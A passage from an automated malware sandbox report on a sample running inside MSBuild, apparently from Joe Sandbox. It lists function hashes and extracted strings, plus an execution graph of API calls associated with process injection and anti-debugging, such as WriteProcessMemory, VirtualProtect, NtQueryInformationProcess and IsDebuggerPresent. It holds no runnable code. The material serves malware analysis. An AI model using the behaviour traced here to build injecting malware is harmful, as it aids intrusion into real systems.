                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 790b3d4858357a0ffdc90ed9cb310faf1f5ba90a580e7b33a43fa9efbb10ca3d
                          • Instruction ID: 6d117ff228b1f6cdc5da47e2ed1a055e864c749fa055f2ea88d54eaf3398fe46
                          • Opcode Fuzzy Hash: 790b3d4858357a0ffdc90ed9cb310faf1f5ba90a580e7b33a43fa9efbb10ca3d
                          • Instruction Fuzzy Hash:
                          Function 05AC4890 Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 397bc79d17ac04104f313ee3552db917d229f843301ba865f47f1076a2d46131
                          • Instruction ID: 23740ef833127cc6a48555715167d46636e9ec705b11ff456859320d0d65382d
                          • Opcode Fuzzy Hash: 397bc79d17ac04104f313ee3552db917d229f843301ba865f47f1076a2d46131
                          • Instruction Fuzzy Hash:
                          Function 05AC3810 Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b47af717cdc94d65f3a530b76030601533b01b8c653563e877d3bd40740ad76f
                          • Instruction ID: d249db9bd4c8f4446d705ac259e5dd12649d69e38c21df6314af31f5cbde1271
                          • Opcode Fuzzy Hash: b47af717cdc94d65f3a530b76030601533b01b8c653563e877d3bd40740ad76f
                          • Instruction Fuzzy Hash:
                          Function 05ACE210 Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e8135e7b8689e3cfe9b27435941bfdb4245358882a1b0d25b804a74c09794e19
                          • Instruction ID: bd8c1bba918269fa4f7f68cbc6d415331abbac7ddfa52a1d1495142b65c72c4f
                          • Opcode Fuzzy Hash: e8135e7b8689e3cfe9b27435941bfdb4245358882a1b0d25b804a74c09794e19
                          • Instruction Fuzzy Hash: EE90023105460C8B55443795750A5597B9CD9895157800091B50D415125ED6BC1145E5
                          Function 058FE7F0 Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f390805396cddd2e52d6cdb757e2bb7cd3964f002e2c9ef91b6dac6db4723058
                          • Instruction ID: 7026bd1aa6228b650f6c287cc15ee322ef768e8ea8242ce045f815f2794a9387
                          • Opcode Fuzzy Hash: f390805396cddd2e52d6cdb757e2bb7cd3964f002e2c9ef91b6dac6db4723058
                          • Instruction Fuzzy Hash: 5B90023108570C8B4A902795784D555B75C95445657C04091B50D825065B7664504695
                          Function 058FE680 Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2084adc9018b8537c987b4124199d1602e9446abfe087603372718078168e4a2
                          • Instruction ID: 4f8b3442d1ca47aea5120fa4b490dba71e7761a2fdd46adb005bc18f405fac8b
                          • Opcode Fuzzy Hash: 2084adc9018b8537c987b4124199d1602e9446abfe087603372718078168e4a2
                          • Instruction Fuzzy Hash: 3390023104474C8F47502B95744D559775DB6445167C40051E50D415059E6564104799
                          Function 02AE9740 Relevance: .0, Instructions: 2COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 246c56f5466ae6949d99fdf07c52280b812e10a5dba724cb232acd6db765a4c5
                          • Instruction ID: d01422dfbbb8410121f69c55623146eb4a5e94f6797de839c261daf461883b9e
                          • Opcode Fuzzy Hash: 246c56f5466ae6949d99fdf07c52280b812e10a5dba724cb232acd6db765a4c5
                          • Instruction Fuzzy Hash:

                          Non-executed Functions

                          Function 02AE309A Relevance: 6.7, Strings: 5, Instructions: 494COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: $A$E$T$U
                          • API String ID: 0-1503325869
                          • Opcode ID: 1d44f73d806021ede265588253ca2a9862a0e56185fddd1c5d3ddd8985db01a5
                          • Instruction ID: 781f8b783488ccce411236f002b4c914dd49e129dc4b1fa4cf6958ff688a78b4
                          • Opcode Fuzzy Hash: 1d44f73d806021ede265588253ca2a9862a0e56185fddd1c5d3ddd8985db01a5
                          • Instruction Fuzzy Hash: 0A12B170E002458FDF11DB68C985BBEBBB3AF85304F09C499D0566B29ADB34D886CB91
                          Function 05AACA8F Relevance: 5.2, Strings: 4, Instructions: 152COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (_jq$(_jq$(_jq$(_jq
                          • API String ID: 0-437935255
                          • Opcode ID: 6bb03151b00f114df8a2392ca51cc682b34d7ed1681022c59dae1286e6a8d0aa
                          • Instruction ID: 2d6ed1de786c42a46a8a9613021d1f00df9384ddfaeb59629661aad9f4a0172a
                          • Opcode Fuzzy Hash: 6bb03151b00f114df8a2392ca51cc682b34d7ed1681022c59dae1286e6a8d0aa
                          • Instruction Fuzzy Hash: C7515C75B002058FDB04EF78C45496EBBF2BF89304B1449A9E546AB3A5EB35DC86CB90
                          Function 058F3D12 Relevance: 5.0, Strings: 4, Instructions: 25COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (ojq$(ojq$0$\sjq
                          • API String ID: 0-1831838980
                          • Opcode ID: 51fb55c5253de0bfcb27b2e318c70b39d83ca9ec3a72b08957609feceb801d64
                          • Instruction ID: 4e06d21e979b9d3ae9adb8b906e06114a78ca74c93d8818e24d5c7d31dad5ce2
                          • Opcode Fuzzy Hash: 51fb55c5253de0bfcb27b2e318c70b39d83ca9ec3a72b08957609feceb801d64
                          • Instruction Fuzzy Hash: 0CE0683071029ACFEB286E3D90A483E2E53BF4C6043584C6ACE02DB2A4DE728C044762

                          Execution Graph

                          Execution Coverage:2.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:70
                          Total number of Limit Nodes:7
                          execution_graph 72545 6c4bb54b 42 API calls 2 library calls 72569 6c4bcbc9 6 API calls __dosmaperr 72546 6c4c004f 36 API calls 72508 6c4aacce 72509 6c4ad11c 72508->72509 72514 6c4a8ecb 72508->72514 72510 6c4b091e WriteProcessMemory 72509->72510 72509->72514 72511 6c4af9c6 72510->72511 72510->72514 72511->72514 72515 6c4a8c60 5 API calls _ValidateLocalCookies 72511->72515 72513 6c4af9cf 72513->72514 72515->72513 72570 6c4b6cc3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 72571 6c4bc3c3 42 API calls 2 library calls 72547 6c4bc347 LeaveCriticalSection __FrameHandler3::FrameUnwindToState 72497 6c4b6edb 72498 6c4b6ee4 72497->72498 72505 6c4b7238 IsProcessorFeaturePresent 72498->72505 72500 6c4b6ef0 72506 6c4b7d0d 10 API calls 2 library calls 72500->72506 72502 6c4b6ef5 72503 6c4b6ef9 72502->72503 72507 6c4b7d3f 7 API calls 2 library calls 72502->72507 72505->72500 72506->72502 72507->72503 72516 6c4a11d0 72534 6c4a1238 CatchIt 72516->72534 72517 6c4a66b5 GetCurrentProcess 72536 6c4b7430 72517->72536 72519 6c4a66e2 GetModuleHandleA 72519->72534 72520 6c4a7164 CloseHandle 72520->72534 72521 6c4a76e3 K32GetModuleInformation GetModuleFileNameA 72521->72534 72522 6c4a70e2 FindCloseChangeNotification CloseHandle 72522->72534 72523 6c4a77dc CloseHandle 72523->72534 72524 6c4a6b60 MapViewOfFile 72524->72534 72525 6c4a687f K32GetModuleInformation GetModuleFileNameA 72525->72534 72526 6c4a7753 MapViewOfFile 72526->72534 72527 6c4a71fa 72537 6c4b6830 5 API calls _ValidateLocalCookies 72527->72537 72529 6c4a7204 72530 6c4a6931 CreateFileA 72530->72534 72531 6c4a6a19 CloseHandle 72531->72534 72532 6c4a69aa CreateFileMappingA 72532->72534 72533 6c4a6dc8 VirtualProtect 72533->72534 72534->72517 72534->72520 72534->72521 72534->72522 72534->72523 72534->72524 72534->72525 72534->72526 72534->72527 72534->72530 72534->72531 72534->72532 72534->72533 72535 6c4a6e72 VirtualProtect 72534->72535 72535->72534 72536->72519 72537->72529 72548 6c4b7b50 6 API calls 4 library calls 72573 6c4c09d0 15 API calls 72550 6c4b6d67 15 API calls ___std_type_info_destroy_list 72551 6c4c1260 20 API calls __startOneArgErrorHandling 72552 6c4bed65 18 API calls __dosmaperr 72553 6c4b707a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __FrameHandler3::FrameUnwindToState 72538 6c4a85f0 GetModuleHandleW 72539 6c4a862b __FrameHandler3::FrameUnwindToState 72538->72539 72540 6c4a8802 NtQueryInformationProcess 72539->72540 72541 6c4a8c04 72539->72541 72540->72539 72544 6c4b6830 5 API calls _ValidateLocalCookies 72541->72544 72543 6c4a8c14 72544->72543 72555 6c4b6e77 14 API calls ___scrt_release_startup_lock 72557 6c4b7e0c 42 API calls 2 library calls 72558 6c4baf02 7 API calls 72559 6c4a1000 5 API calls _ValidateLocalCookies 72574 6c4ba080 25 API calls 3 library calls 72560 6c4bce06 17 API calls 72561 6c4b9d1b 37 API calls 2 library calls 72563 6c4b9013 45 API calls 2 library calls 72564 6c4be510 32 API calls 72576 6c4bf695 62 API calls 72565 6c4ba52b 6 API calls 72577 6c4b6eab 21 API calls 2 library calls 72579 6c4beaaf 15 API calls ___free_lconv_mon 72567 6c4bdf20 19 API calls 2 library calls 72586 6c4bc8bf 20 API calls ___free_lconv_mon 72587 6c4bbbbc 17 API calls 2 library calls 72589 6c4bcdb5 FreeLibrary

                          Executed Functions

                          Function 6C4A11D0 Relevance: 58.7, APIs: 17, Strings: 13, Instructions: 6188filememoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2244579024.000000006C4A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C4A0000, based on PE: true
                          • Associated: 00000005.00000002.2244494965.000000006C4A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2244737468.000000006C4C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2244808518.000000006C4CA000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2245565124.000000006C515000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2245639439.000000006C51F000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_6c4a0000_Qqgmpuehc.jbxd
                          Similarity
                          • API ID: File$CloseModule$Handle$CreateInformationNameProtectViewVirtual$ChangeFindMappingNotification
                          • String ID: %89$("s$;s_G$=!Oe$@$KL1$KL1$MP{P$OZg$OZg$YhD$ax4$e\
                          • API String ID: 1881618098-839319396
                          • Opcode ID: 6950128e580e8a75fd33f817f132bf0b4797659a41047428981568c0be1c5cfa
                          • Instruction ID: f646f11ba688a7ddd426888802882bb5751a63300fd5cf534e6f4f2a085a3fb3
                          • Opcode Fuzzy Hash: 6950128e580e8a75fd33f817f132bf0b4797659a41047428981568c0be1c5cfa
                          • Instruction Fuzzy Hash: 73B32139A442458FCB14CEBCC995FC877F1AB63315F115289D418ABBA9DB369D8ACF00
                          Function 6C4AACCE Relevance: 149.4, APIs: 1, Strings: 82, Instructions: 4162injectionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • WriteProcessMemory.KERNELBASE ref: 6C4B091E
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2244579024.000000006C4A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C4A0000, based on PE: true
                          • Associated: 00000005.00000002.2244494965.000000006C4A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2244737468.000000006C4C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2244808518.000000006C4CA000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2245565124.000000006C515000.00000020.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2245639439.000000006C51F000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_6c4a0000_Qqgmpuehc.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID: '-$'?$($-2}$-7|Tg,>$1$=U(X$j0$uL7bREREFs2jSUo0v2MnQ0NaQ0NDQ7i+20RERBb7ltpJNL/qDENDWkNDQ0O4vttEREQWPpRXSTS/UCpDQ1pDQ0NDuL7bREREFtxgrEg0v8b1Q0NaQ0NDQ7i+20RERBbgxW$3$Y$E$!v$#3$#7$(K$)_$*3$*L$-&$1o$23$3'$;/$;B$;U$;~$<3$?E$AA$AN$Ar$By$D%$D)$EZ$F($G$H%$Mf$O|$QX$R;$U3$V7$VG$_'$_*$`c$aC$aa$df$e;$fo$g+$gO$hu$i&$i)$j/$jt$k@$kT$oA$p9$r.$s)$s:$vQ$wI$|$|+$~H$#$#$+$,$2$>$P$V$g
                          • API String ID: 3559483778-605755562
                          • Opcode ID: 532cd1aa45eb1ceeaea700b952b3b51bbcaceb9ee5ad42bcc7639ed3c78f09af
                          • Instruction ID: f46131901473d69c34cdf775db44a3ffbf196852c03d88a3b85a6433c469d2c9
                          • Opcode Fuzzy Hash: 532cd1aa45eb1ceeaea700b952b3b51bbcaceb9ee5ad42bcc7639ed3c78f09af
                          • Instruction Fuzzy Hash: 4063A43598D119CBE710CDBCCD88FDC76B0AB27344F508682D5A8A7E18C631DE978B96